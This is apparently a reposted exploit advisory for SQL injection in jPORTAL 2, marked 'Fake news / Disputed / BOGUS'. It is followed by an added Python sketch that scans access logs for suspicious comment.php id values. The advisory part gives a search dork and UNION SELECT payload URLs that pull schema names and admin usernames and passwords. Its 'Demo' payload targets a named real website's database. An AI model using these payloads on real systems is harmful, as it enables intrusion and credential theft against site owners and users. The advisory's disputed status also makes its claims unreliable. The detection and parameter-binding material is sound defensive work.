WARNING! Fake news / Disputed / BOGUS

jPORTAL 2 SQL Injection

2012.01.02
Credit: H4ckCity
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

############################################################################
# Exploit Title: jPORTAL 2 SQL Injection Vulnerability
# Google Dork: "powered by jPORTAL 2"
# Date: 8/12/2011
# Author: H4ckCity Security Team
# Discovered By: farbodmahini
# Home: WwW.H4ckCity.Org
# Software Link: http://jportal2.com/
# Version: All versions
# Security Risk: High
# Tested on: GNU/Linux Ubuntu - Windows Server
############################################################################
# Exploit:
#
# http://target.com/comment.php?what=news&id=[sqli]
#
# To get the DB:
#
# http://target.com/comment.php?what=news&id=999 union all select null,null,(select distinct
# concat(unhex(Hex(cast(schema_name as char)))) from `information_schema`.schemata limit
# 1,1),null,null,null,null,null,null--
#
# To get the username & password:
#
# http://target.com/comment.php?what=news&id=999 union all select null,null,(select concat
# (unhex(Hex(cast(admins.nick as char))),0x3a,unhex(Hex(cast(admins.pass as char)))) from
# `target_database`.admins Order by nick limit 0,1) ,null,null,null,null,null,null--
#
# Demo:
#
# http://www.lotnisko.szprotawa.org.pl/comment.php?what=news&id=3 union all
# select null,null,(select concat(unhex(Hex(cast(admins.nick as char))),0x3a,unhex(Hex(cast
# (admins.pass as char)))) from `tmnet_lotnisko`.admins Order by nick limit 0,1)
# ,null,null,null,null,null,null--
#
############################################################################
# Special Thanks : Mehdi.H4ckcity-2MzRp-Mikili-M.Prince-Bl4ck.Viper-iC0d3R-
# nitrojen90-hellboy-K0242-kingcope-Mr.M4st3r , ...
############################################################################
# GreetZ : All H4ckCity Member
############################################################################

References:

http://jportal2.com/
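
Detection sketch for the requests described above, added here as an example and not part of the original advisory or of jPORTAL: it scans web-server access logs for comment.php requests whose id parameter is not a plain integer. The log lines are constructed samples, and the assumption that id is always a decimal integer is inferred from the advisory's id=3 / id=999 examples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [02/Jan/2012:10:00:01 +0100] "GET /comment.php?what=news&id=3 HTTP/1.1" 200 5120
203.0.113.9 - - [02/Jan/2012:10:00:07 +0100] "GET /comment.php?what=news&id=999%20union%20all%20select%20null,null,null-- HTTP/1.1" 200 4811
203.0.113.9 - - [02/Jan/2012:10:00:09 +0100] "GET /comment.php?what=news&id=999+UNION+ALL+SELECT+null,(select+schema_name+from+information_schema.schemata)-- HTTP/1.1" 200 4790
198.51.100.7 - - [02/Jan/2012:10:01:00 +0100] "GET /index.php?id=abc HTTP/1.1" 200 900
198.51.100.7 - - [02/Jan/2012:10:01:02 +0100] "GET /comment.php?what=news&id=12abc HTTP/1.1" 200 100
"""

# Request line inside the quoted field; non-greedy so raw spaces in the URL are kept.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/\d\.\d"')
# Assumption: a legitimate id is a short decimal integer.
NUMERIC_ID = re.compile(r"[0-9]{1,10}")
# Tokens that appear in the advisory's UNION-based payloads.
SQL_TOKENS = re.compile(r"\b(union|select|information_schema|concat|unhex)\b", re.I)

def scan(log_text):
    """Return (client_ip, reason, decoded_id) for each suspicious comment.php hit."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/comment.php"):
            continue
        # parse_qs percent-decodes values and turns '+' into a space.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if NUMERIC_ID.fullmatch(value):
                continue
            reason = "sql-keywords" if SQL_TOKENS.search(value) else "non-numeric-id"
            findings.append((line.split()[0], reason, value))
    return findings

if __name__ == "__main__":
    for ip, reason, value in scan(SAMPLE_LOG):
        print(f"{ip}\t{reason}\t{value!r}")
```

The same integer-only rule belongs in the application itself: cast or validate id before it reaches the query and bind it as a parameter, so the log check becomes a second line of defence.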

